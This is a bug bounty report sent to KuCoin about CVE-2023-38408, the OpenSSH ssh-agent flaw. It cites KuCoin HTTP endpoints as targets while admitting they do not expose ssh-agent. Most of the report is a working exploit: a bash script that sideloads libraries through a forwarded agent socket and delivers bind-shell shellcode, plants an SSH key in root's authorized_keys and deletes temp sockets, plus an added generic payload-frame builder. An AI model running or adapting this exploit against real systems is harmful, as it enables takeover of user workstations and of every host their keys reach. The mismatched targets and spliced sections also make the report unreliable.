*.kucoin.com
Hello Good Time!
Subject: Bounty bug report for CVE-2023-38408 in OpenSSH
Summary: I am submitting a bug bounty report regarding a security vulnerability, CVE-2023-38408 in OpenSSH, that specifically affects the ssh-agent component in versions prior to 9.3p2.
Vulnerability details:
CVE ID: CVE-2023-38408
Affected software: OpenSSH (ssh-agent component)
Affected versions: OpenSSH prior to 9.3p2
Problem type: remote code execution via ssh-agent PKCS#11 provider loading
CVSS v3.1 vector (NVD): AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, base score 9.8
Description: CVE-2023-38408 is an insufficiently trusted search path in ssh-agent's PKCS#11 support. A client of the agent can ask it to load a "PKCS#11 provider" by path (ssh-add -s <path>), and vulnerable versions dlopen() whatever shared library is named, so code in that library runs inside the agent process. If a user forwards their ssh-agent to a system the attacker controls (ssh -A, ForwardAgent yes), the attacker can issue those requests over the forwarded socket and, by loading a chain of libraries that already exist on the user's machine, achieve code execution there: on the host running ssh-agent, not on the host the user connected to. Exploitation requires the presence of specific libraries on the victim system. The issue is an incomplete fix for the earlier CVE-2016-10009.
Effect: code execution in the ssh-agent process on the workstation of any user who forwards a vulnerable agent to an attacker-controlled host, with that user's privileges and with every key loaded in the agent available to the attacker; from there the workstation, and the systems those keys reach, can be compromised.
Recommendations:
OpenSSH update: upgrade every host that runs ssh-agent to OpenSSH 9.3p2 or later, where the issue is fixed (9.6 is the latest release at the time of this report). Since 9.3p2, remote (forwarded) agent clients can no longer load PKCS#11 modules by default.
Interim mitigation on unpatched hosts: start the agent with an empty provider allowlist (ssh-agent -P '') or an allowlist naming only the provider libraries actually needed, and do not forward the agent (ssh -A / ForwardAgent yes) to hosts you do not fully trust; forwarding to an attacker-controlled host is the precondition for exploitation.
Release notes: https://www.openssh.com/releasenotes.html
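The check that should accompany a report like this, added here as an example (not part of the original submission): the version that matters for CVE-2023-38408 is the ssh-agent on the machine that forwards the agent, so this is run where ssh-agent runs, against the text `ssh -V` prints (OpenSSH writes it to stderr). The function below parses an OpenSSH version string and reports whether the build is older than 9.3p2; the sample strings are constructed inputs, and the optional banner grab returns the sshd banner of a remote host, which identifies the server build only, not the affected component.

```sh
#!/bin/sh
# openssh_pre_9_3p2 "OpenSSH_9.3p1, OpenSSL 3.0.2 15 Mar 2022"
# exit 0: older than 9.3p2 (CVE-2023-38408 fix absent)
# exit 1: 9.3p2 or newer
# exit 2: no OpenSSH version found in the string
openssh_pre_9_3p2() {
  case $1 in
    *OpenSSH_*) ;;
    *) return 2 ;;
  esac
  v=${1#*OpenSSH_}          # drop everything up to "OpenSSH_"
  v=${v%%[!0-9.p]*}         # keep the leading [0-9.p] run, e.g. "9.3p1"
  major=${v%%.*}
  rest=${v#*.}
  minor=${rest%%p*}
  patch=${rest#*p}
  if [ "$patch" = "$rest" ]; then patch=0; fi   # no "pN" portable-release suffix
  case "$major$minor$patch" in
    ''|*[!0-9]*) return 2 ;;                     # not a numeric version
  esac
  if [ "$major" -lt 9 ]; then return 0; fi
  if [ "$major" -gt 9 ]; then return 1; fi
  if [ "$minor" -lt 3 ]; then return 0; fi
  if [ "$minor" -gt 3 ]; then return 1; fi
  if [ "$patch" -lt 2 ]; then return 0; fi
  return 1
}

# remote_sshd_banner HOST [PORT]: first line sshd sends, e.g. "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4".
# This is the server's build; CVE-2023-38408 is about the agent on the client side.
remote_sshd_banner() {
  nc -w 3 "$1" "${2:-22}" </dev/null 2>/dev/null | head -n 1
}

# Local check, only when an ssh binary is present on this machine.
if command -v ssh >/dev/null 2>&1; then
  banner=$(ssh -V 2>&1)
  if openssh_pre_9_3p2 "$banner"; then
    echo "ssh-agent build on this host is older than 9.3p2: $banner"
  else
    echo "ssh-agent build on this host is 9.3p2 or newer, or not OpenSSH: $banner"
  fi
fi
```

A vendor-patched build (distributions often backport the fix without changing the version) will still report as older than 9.3p2 here; in that case the distribution's changelog for the installed package is the authority.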
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2023-38408
https://www.cybersecurity-help.cz/vdb/SB2023072068
Target:
https://api.kucoin.com/
http://52.28.186.22:49155/
Impact:
An attacker who controls a host to which a target user forwards a vulnerable ssh-agent can execute arbitrary code on that user's machine, with the user's privileges and with every key in the agent at hand. That is full compromise of the user's workstation and a pivot to every system those keys grant access to. Note that the listed URLs are HTTP endpoints and do not expose ssh-agent: the vulnerability is only reachable if a user on the target side runs a pre-9.3p2 ssh-agent and forwards it to an attacker-controlled host.
PoC code (bash script):
#!/bin/bash
# CVE-2023-38408 PoC: ssh-agent PKCS#11 library sideloading over a forwarded agent socket.
# Written for a lab ("room") box whose user forwards their ssh-agent to this attack box.
# The four libraries loaded with ssh-add -s below must exist on the victim at those paths.
# (ASCII-art banner omitted; it did not survive extraction.)
echo "CVE-2023-38408 PoC"
echo; echo

# GET ATTACKER IP, 3 options: input, hard-coded, full-auto
#read -p "Enter the AttackerBox IP address: " attackerIP
#attackerIP=10.10.123.236
attackerIP=$(ip a | grep ens5 | grep inet | cut -d '/' -f 1 | cut -d ' ' -f 6)

# GET ROOM IP, 3 options: input, hard-coded, full-auto
read -p "Enter the ROOM IP address: " roomIP
#roomIP=10.10.83.183
#roomIP=$(arp -a | sed -n '3p' | awk -F'[()]' '{print $2}')
echo "Room IP address: $roomIP"

echo -e "\nFrom ATTACKBOX, in new term, login with SSH. Type \e[1;32mssh redqueenrebel@$roomIP\e[0m"
echo -e "Enter password \e[1;32m'DownTheRabbitHole!'\e[0m"

function Wait_for_EnterKey {
    echo -e "\nI'll wait for you here..."
    while true; do
        echo "Press Enter to continue:"
        read -rsn 1 key
        if [[ $key == "" ]]; then
            echo "Continuing..."
            break
        else
            echo -e "\033[1A\033[KInvalid key pressed. Press Enter to continue:"
        fi
    done
}

# CLEAR TMP DIR OF PRIOR SSH SESSIONS (old forwarded-agent sockets)
rm -rf /tmp/ssh*

# ADD ALICE SSH KEY so the victim's background connection can log in here
echo "ssh-rsa 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 alice@workstation" >> /root/.ssh/authorized_keys

echo -e "\nEnter this command in redqueen term: \e[1;32mecho ${attackerIP} > /tmp/ip.txt\e[0m"
Wait_for_EnterKey

# WAIT FOR CONNECTION (the victim connects back with agent forwarding)
echo -e "\nWait 1 min for background connection...\n"
sleep 60

# FIND THE FORWARDED SSH-AGENT SOCKET AND SET IT AS ENV VAR
agent_path=$(echo /tmp/ssh-*/agent.*)
export SSH_AUTH_SOCK="$agent_path"
echo -e "\nSSH_AUTH_SOCK set to: $SSH_AUTH_SOCK\n"

# Sideload 1st library
ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub

# x86-64 Linux bind shell on TCP 31337 (0x7a69): socket/bind/listen/accept, dup2 0-2, execve /bin/sh; 150 bytes
SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'

# UPLOAD SHELLCODE TO VICTIM: one SSH_AGENTC_ADD_SMARTCARD_KEY message (type 0x14) with
# provider "/usr/lib/modules" and a "PIN" of 10000 NOP bytes followed by the shellcode,
# framed as uint32 length (0x27bf) | type | string provider | string pin (0x27a6 bytes).
# The trailing '&' makes this command a background job.
(perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$SHELLCODE") | nc -U "$SSH_AUTH_SOCK" &

# WAIT FOR TRANSFER TO FINISH
echo -e "\nTransferring your shellcode now. Please stand by..."
sleep 10
kill $!   # terminate the background nc job (SIGTERM)
echo -e "Transfer complete\n"

# Sideload 2nd library to register the signal handler for the Segmentation Fault (SIGSEGV) signal
ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so

# Sideload 3rd library: replaces the signal handler routine with a gadget that redirects execution back to the stack
ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0

echo -e "\nOK! Last steps...Hit \e[1;32mEnter\e[0m,"
echo -e "then in redqueen terminal, type \e[1;32mnc localhost 31337\e[0m to access the bind shell (shellcode)."
echo -e "\nEnjoy your shell! For Flag type \e[1;32mcat /home/alice/Desktop/*\e[0m"

# Sideload last library to cause the segfault and execute the shellcode
ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0

# Keep script running for connection to bind shell
while true; do true; done
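The message on the wire. What the PoC's perl one-liner sends is a single ssh-agent request, SSH_AGENTC_ADD_SMARTCARD_KEY (type 20, the request behind ssh-add -s): its "provider" string is the path ssh-agent will dlopen(), and its "pin" string carries the NOP sled plus shellcode. The block below is an added example, not part of the original PoC, that builds the same frame with every length computed instead of hard-coded; the 0x27bf and 0x27a6 in the one-liner are exactly the body length and the pin length for a 10000-byte sled plus the 150-byte shellcode. It writes the frame to stdout, so `add_smartcard_key_frame /usr/lib/modules payload.bin | nc -U "$SSH_AUTH_SOCK"` would deliver it the way the PoC does. Provider path and pin file are arguments; the only assumption is the agent wire format documented in draft-miller-ssh-agent.

```sh
#!/bin/sh
# Frame an SSH_AGENTC_ADD_SMARTCARD_KEY request for ssh-agent.
# Wire format (draft-miller-ssh-agent):
#   uint32 length | byte type(20) | string provider | string pin
# where string = uint32 length | bytes. The frame goes to stdout because a
# shell variable cannot hold the NUL bytes inside the length fields.

# be32 N: write N as a big-endian uint32 (octal escapes are POSIX printf)
be32() {
  printf "$(printf '\\%03o\\%03o\\%03o\\%03o' \
    $(( ($1 >> 24) & 255 )) $(( ($1 >> 16) & 255 )) $(( ($1 >> 8) & 255 )) $(( $1 & 255 )))"
}

# blen STR: length of STR in bytes (not characters)
blen() { printf '%s' "$1" | wc -c | tr -d ' '; }

# body_len PROVIDER PIN_BYTES: value of the leading length field
body_len()  { echo $(( 1 + 4 + $(blen "$1") + 4 + $2 )); }
# frame_len PROVIDER PIN_BYTES: total bytes on the wire
frame_len() { echo $(( 4 + $(body_len "$1" "$2") )); }

# add_smartcard_key_frame PROVIDER PIN_FILE > frame.bin
# PROVIDER is the library path the agent will dlopen(); PIN_FILE holds the
# "pin" bytes (in the PoC: a 10000-byte NOP sled followed by the shellcode).
add_smartcard_key_frame() {
  provider=$1
  pinfile=$2
  pinlen=$(wc -c < "$pinfile" | tr -d ' ')
  be32 "$(body_len "$provider" "$pinlen")"
  printf '\024'                     # 20 = SSH_AGENTC_ADD_SMARTCARD_KEY
  be32 "$(blen "$provider")"
  printf '%s' "$provider"
  be32 "$pinlen"
  cat "$pinfile"
}

# The PoC's hard-coded sizes for provider "/usr/lib/modules" and a 10150-byte
# pin (10000 NOPs + 150-byte shellcode): body 10175 (0x27bf), frame 10179.
printf 'body=%s frame=%s\n' "$(body_len /usr/lib/modules 10150)" "$(frame_len /usr/lib/modules 10150)"
```

Getting the lengths right matters: ssh-agent reads exactly the number of bytes the leading uint32 announces and discards a frame whose inner strings overrun it, which is why the one-liner has to spell out both 0x27bf and 0x27a6 by hand.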